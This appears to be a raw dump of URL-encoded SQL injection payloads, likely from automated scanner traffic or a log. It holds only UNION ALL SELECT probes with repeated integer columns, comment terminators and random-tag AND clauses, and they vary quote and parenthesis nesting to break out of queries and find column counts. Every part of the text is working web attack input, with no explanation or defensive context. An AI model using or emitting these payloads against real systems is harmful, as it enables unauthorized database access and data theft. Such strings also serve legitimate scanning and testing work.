-8046%27%20UNION%20ALL%20SELECT%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%2C%203444%23%20AND%20%27nRaJ%27%20LIKE%20%27nRaJ -6882%22%29%20UNION%20ALL%20SELECT%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%23%20AND%20%28%22ocLw%22%3D%22ocLw -6734%22%29%20UNION%20ALL%20SELECT%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%2C%207777%23%20AND%20%28%22SGKs%22%3D%22SGKs -3219%22%29%20UNION%20ALL%20SELECT%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%2C%207176%23%20AND%20%28%22EHPZ%22%3D%22EHPZ -6871%22%29%20UNION%20ALL%20SELECT%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%2C%207891%23%20AND%20%28%22gzFZ%22%3D%22gzFZ -7872%22%29%20UNION%20ALL%20SELECT%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%2C%204257%23%20AND%20%28%22qqNv%22%3D%22qqNv -9612%22%29%20UNION%20ALL%20SELECT%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%23%20AND%20%28%22tghh%22%3D%22tghh -8708%22%29%20UNION%20ALL%20SELECT%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%23%20AND%20%28%22sgwg%22%3D%22sgwg -4217%22%29%20UNION%20ALL%20SELECT%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%23%20AND%20%28%22zuTX%22%3D%22zuTX -9110%22%29%20UNION%20ALL%20SELECT%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%23%20AND%20%28%22oCcr%22%3D%22oCcr -4808%22%29%20UNION%20ALL%20SELECT%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%2C%204775%23%20AND%20%28%22cJim%22%3D%22cJim -6778%22%29%29%20UNION%20ALL%20SELECT%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%2C%202664%23%20AND%20%28%28%22Wbzy%22%3D%22Wbzy -2822%22%29%29%20UNION%20ALL%20SELECT%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%2C%203740%23%20AND%20%28%28%22Wkmn%22%3D%22Wkmn -9083%22%29%29%20UNION%20ALL%20SELECT%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%23%20AND%20%28%28%22VGwj%22%3D%22VGwj -9280%22%29%29%20UNION%20ALL%20SELECT%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%2C%205918%23%20AND%20%28%28%22lhSR%22%3D%22lhSR -6990%22%29%29%20UNION%20ALL%20SELECT%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%2C%201242%23%20AND%20%28%28%22mREO%22%3D%22mREO -3975%22%29%29%20UNION%20ALL%20SELECT%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%23%20AND%20%28%28%22FZce%22%3D%22FZce -8137%22%29%29%20UNION%20ALL%20SELECT%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%23%20AND%20%28%28%22eASZ%22%3D%22eASZ -4298%22%29%29%20UNION%20ALL%20SELECT%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%2C%201932%23%20AND%20%28%28%22tJXj%22%3D%22tJXj -1497%22%29%29%20UNION%20ALL%20SELECT%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%23%20AND%20%28%28%22hiyK%22%3D%22hiyK -2393%22%29%29%20UNION%20ALL%20SELECT%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%23%20AND%20%28%28%22FNmq%22%3D%22FNmq -5825%22%29%29%29%20UNION%20ALL%20SELECT%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%2C%207665%23%20AND%20%28%28%28%22xmAk%22%3D%22xmAk -4325%22%29%29%29%20UNION%20ALL%20SELECT%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%23%20AND%20%28%28%28%22qLJm%22%3D%22qLJm -9925%22%29%29%29%20UNION%20ALL%20SELECT%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%2C%202484%23%20AND%20%28%28%28%22kBgB%22%3D%22kBgB -2020%22%29%29%29%20UNION%20ALL%20SELECT%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%2C%208678%23%20AND%20%28%28%28%22COYO%22%3D%22COYO -5671%22%29%29%29%20UNION%20ALL%20SELECT%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%2C%207080%23%20AND%20%28%28%28%22CZnf%22%3D%22CZnf -6727%22%29%29%29%20UNION%20ALL%20SELECT%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%2C%208048%23%20AND%20%28%28%28%22GARK%22%3D%22GARK -4760%22%29%29%29%20UNION%20ALL%20SELECT%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%2C%205929%23%20AND%20%28%28%28%22DSzK%22%3D%22DSzK -9444%22%29%29%29%20UNION%20ALL%20SELECT%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%23%20AND%20%28%28%28%22pnIJ%22%3D%22pnIJ -4046%22%29%29%29%20UNION%20ALL%20SELECT%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%2C%206748%23%20AND%20%28%28%28%22SAnF%22%3D%22SAnF -9404%22%29%29%29%20UNION%20ALL%20SELECT%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%23%20AND%20%28%28%28%22gCEy%22%3D%22gCEy -3047%22%20UNION%20ALL%20SELECT%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%2C%204389%23%20AND%20%22jvuo%22%3D%22jvuo -3136%22%20UNION%20ALL%20SELECT%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%2C%205115%23%20AND%20%22tyKk%22%3D%22tyKk -5999%22%20UNION%20ALL%20SELECT%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%23%20AND%20%22CPlS%22%3D%22CPlS -3441%22%20UNION%20ALL%20SELECT%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%2C%201710%23%20AND%20%22jrFl%22%3D%22jrFl -9498%22%20UNION%20ALL%20SELECT%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%23%20AND%20%22gEUa%22%3D%22gEUa -2974%22%20UNION%20ALL%20SELECT%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%23%20AND%20%22ompz%22%3D%22ompz -3432%22%20UNION%20ALL%20SELECT%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%2C%209751%23%20AND%20%22OYMQ%22%3D%22OYMQ -1350%22%20UNION%20ALL%20SELECT%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%23%20AND%20%22ugHQ%22%3D%22ugHQ -8515%22%20UNION%20ALL%20SELECT%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%23%20AND%20%22gaNP%22%3D%22gaNP -9175%22%20UNION%20ALL%20SELECT%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%23%20AND%20%22yxyc%22%3D%22yxyc -3745%22%29%20UNION%20ALL%20SELECT%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%2C%201059%23%20AND%20%28%22qarG%22%20LIKE%20%22qarG -2758%22%29%20UNION%20ALL%20SELECT%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%23%20AND%20%28%22TrZY%22%20LIKE%20%22TrZY -5086%22%29%20UNION%20ALL%20SELECT%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%2C%202986%23%20AND%20%28%22zPbS%22%20LIKE%20%22zPbS -6559%22%29%20UNION%20ALL%20SELECT%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%23%20AND%20%28%22Hicp%22%20LIKE%20%22Hicp -8345%22%29%20UNION%20ALL%20SELECT%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%23%20AND%20%28%22JoaW%22%20LIKE%20%22JoaW 